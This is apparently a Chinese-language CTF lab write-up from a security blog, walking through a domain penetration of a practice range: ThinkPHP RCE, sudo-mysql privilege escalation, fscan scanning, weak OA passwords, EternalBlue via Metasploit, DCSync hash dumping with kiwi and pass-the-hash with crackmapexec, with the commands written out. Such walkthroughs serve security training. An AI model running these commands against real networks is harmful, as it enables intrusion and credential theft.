前言:本文中涉及到的技术,只提供思路,严禁用于违法测试
当然哦,还是用靶机吧,希望大家都保护好自己,哈哈哈
0x01 开启环境
0x02 web渗透
开启环境,访问web页面。
发现登录功能是个鸡肋,翻看别的功能点。
查看到这个熟悉的log,猜测可能存在框架漏洞。
使用漏洞利用工具进行探测。
发现存在thinkphp5.0.23漏洞,成功拿下webshell。
0x03 内网渗透
尝试suid提取,无结果。
find / -perm -u=s -type f 2>/dev/null
尝试sudo提取。
发现这个mysql是一个利用点。
https://gtfobins.github.io/
查看提权命令
sudo mysql -e '! find / -name flag*'
sudo mysql -e '! cat /root/flag/flag01.txt'
拿下flag1。
继续信息收集。
ip a
发现有一个内网网段,上传fscan,进行内网扫描。
./fscan -h 172.22.1.0/24 1.txt
打开查看结果
172.22.1.18:135 open
172.22.1.21:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.2:88 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:445 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.18:139 open
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
已完成 14/14
[*] 扫描结束,耗时: 11.656481329s
探测出内网其他的资产。
现在我们总结一下
172.22.1.2-》DC域控
172.22.1.21-》Windows的机器并且存在MS17-010 漏洞
172.22.1.18-》信呼OA办公系统
现在进行内网穿透。
第一种用 NPS进行代理转发。
https://blog.csdn.net/qq_44159028/article/details/122719330
第二种chisel同ew相似但是更稳定
https://blog.csdn.net/weixin_43093631/article/details/118273506
也可以用frp等等,都可以用 只要版本对应上就行。
目标内网信呼OA。
弱口令 admin/admin123就成功登录了进去。
查找信呼OA漏洞,发现有一个RCE漏洞,这是第一种打法。
https://blog.csdn.net/solitudi/article/details/118675321
第二种做法是在扫目录基础上,利用/phpmyadmin
,可以直接 root/root 登录,然后利用日志写入 webshell
这里就不再演示了。
https://blog.csdn.net/m0_48108919/article/details/123053622
通过RCE漏洞拿到webshell。(蚁剑连接的时候记得配置上代理)
拿下flag2。
接下来打永恒之蓝的漏洞。
使用msf,配置kali自带的proxychains。
https://www.cnblogs.com/junlin623/p/17442091.html
proxychains msfconsole走 socks5 流量,
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
得到正向的 meterpreter shell 后,接下来就是利用 DCSync
https://www.cnblogs.com/CoLo/p/16488892.html
最大的特点就是可以实现不登录到域控而获取域控上的数据。
在 MSF 下直接load kiwi,然后
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
导出域内所有用户的 Hash。
之前扫出来172.22.1.2的 445 端口开放,利用 smb 哈希传递,直接用 kali 自带的 crackmapexec,
proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "$cmd"
最后一部分 flag 在/Users/Administrators/flag下
拿到flag3。
0x04 总结
web打点--》提权--》内网穿透--》内网渗透--》拿下域控。
该靶场对于新学内网的师傅还是挺友好的,除了最后拿下域控那一步,其余的都应该是常见的渗透手法。
以上为我的一些做题笔记,大佬勿喷。
感谢各位大佬们关注LHACK安全,正在努力的进步中,后续会坚持更新渗透漏洞思路分享、好用工具分享以及挖掘SRC思路等文章,希望能得到各位师傅们的关注与支持。想要加交流群的师傅,主页加我,备注加群。
原文始发于微信公众号(LHACK安全):一次完整的实战域渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论